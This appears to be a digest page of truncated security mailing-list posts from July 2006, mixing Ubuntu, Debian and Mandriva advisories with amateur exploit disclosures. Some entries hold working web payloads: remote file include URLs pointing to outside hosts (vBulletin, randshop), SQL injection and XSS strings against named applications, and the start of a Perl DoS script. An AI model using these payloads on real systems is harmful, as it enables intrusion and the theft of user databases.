[USN-309-1] libmms vulnerability
2006-07-05 Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-309-1 July 05, 2006
libmms vulnerability
CVE-2006-2200
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
This advisory

[USN-308-1] shadow vulnerability
2006-07-05 Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-308-1 July 05, 2006
shadow vulnerability
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

Public Advisory: Horde 3.1.1, 3.0.10 Multiple Security Issues
2006-07-05 Moritz Naumann (securityfocus com moritz-naumann com)

[SECURITY] [DSA 1104-2] New OpenOffice.org packages fix arbitrary code execution
2006-07-06 joey infodrom org (Martin Schulze)

TigerTom Scripts
2006-07-05 luny youf**ktard com
TigerTom Scripts
Homepage: http://www.ttfreeware.co.uk/
Affected files:
TTCalc script v1.0
---------------------------
Data passed in the "Length of loan, years" and "Length of mortgage, years" input boxes are not sanitized before being generated.
For a PoC in the input boxes listed

vBulletin 3.5.4 (install_path) Exploit
2006-07-05 CarcaBotx yahoo com
vBulletin 3.5.4 (install_path) Exploit
- by: CarcaBot
- application : vbulletin
- URL : http://www.vbulletin.com
- Exploit: www.vicitimsite.com/forumpath/install/upgrade_301.php?step=http://CarcaBot.Ro
- More Details: Dump SQL DB named user then u have access at all md5 users passwords

[ MDKSA-2006:116 ] - Updated kernel packages fixes multiple vulnerabilities
2006-07-05 security mandriva com

BLOG:CMS 4.1.0 SQL injection File Include Vulnerability
2006-07-05 securityconnection gmail com
BLOG:CMS 4.1.0
http://blogcms.com
-------------
SQL injection
-------------
http://target.xx/?1'[SQL]
http://target.xx/?item='[SQL]
http://target.xx/?blog='[SQL]
http://target.xx/?member='[SQL]
http://target.xx/?typeface=1'[SQL]
http://target.xx/?results='[SQL]
http://target.xx/?DokuWiki=

sNews 1.3 XSS SQL
2006-07-05 securityconnection gmail com
sNews 1.3
http://snews.solucija.com
--------------------------
Cross Site Scripting (XSS)
--------------------------
POST http://target.xx:80/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 88
pojam=<script>alert(/EllipsisSecur

Invision Power Board "v1.X & 2.X" SQL Injection
2006-07-04 CrAzY CrAcKeR hotmail com
================================
Discovered By: CrAzY CrAcKeR
================================
Example:-
/index.php?act=ketqua&code=showcat&idcat=[SQL]
/index.php?act=Attach&type=post&id=[SQL]
/index.php?act=Profile&CODE=[SQL]
/index.php?act=ketqua&code=[SQL]
/coins_list.php?member_id=[SQL

file include exploits in randshop v1.2
2006-07-04 black code (black-cod3 hotmail com) (1 replies)
file include exploits in randshop v1.2
forum type : randshop v1.2
bug found by : black-code
team : site-down
type : file include
####################################################
Exploits :
http://www.example.com/randshop/index.php?incl=http://evilscript?
#####################################

[scip_Advisory 2351] Kyberna AG ky2help various form fields SQL Injection
2006-07-04 Marc Ruef (maru scip ch)
Kyberna AG ky2help various form fields SQL Injection
scip AG Vulnerability ID 2351 (07/04/2005)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2351
I. INTRODUCTION
Kyberna ky2help is a commercial solution for a web-based ticketing and support system. Users are able to send tickets and those are

[scip_Advisory 2352] F5 FirePass 4100 prior 6.x multiple Cross Site Scripting
2006-07-04 Marc Ruef (maru scip ch)
F5 FirePass 4100 prior 6.x multiple Cross Site Scripting
scip AG Vulnerability ID 2352 (07/04/2006)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2352
I. INTRODUCTION
F5 FirePass is an appliance which allows a remote communication between SSL-VPN endpoints. This secure connectivity to corporate

TBE 4.0 XSS
2006-07-03 securityconnection gmail com
The Banner Engine - tbe4.0
Native Solutions
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/top.php?action=search&catid=catid&text=%3Cscript%3Ealert(%22Ellipsis+Security+Test%22)%3C/script%3E
http://target.xx/top.php?action=search&catid=catid&t

imgsvr dos exploit by n00b
2006-07-03 co296 aol com
I have provided the following proof of concept..
Affected-software
Credit's :n00b.
http://freshmeat.net/projects/imgsvr/
Exploit,
#!/usr/bin/perl
##Proof of concept.
#################################################################################
#Credit's:to n00b for finding this bug.

ZoneAlarm Insufficient protection of registry key 'VETFDDNT\Enum' Vulnerability
2006-07-03 David Matousek (david matousec com)
ZoneAlarm insufficiently checks calling standard Windows API functions RegSaveKey, RegRestoreKey and RegDeleteKey.
The whole advisory with more details is available here
http://www.matousec.com/info/advisories/ZoneAlarm-Insufficient-protection-of-registry-key-VETFDDNT-Enum.php
Regards,
--
David
Ubuntu Security Notice USN-310-1 July 05, 2006
ppp vulnerability
CVE-2006-2194
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6.06 LTS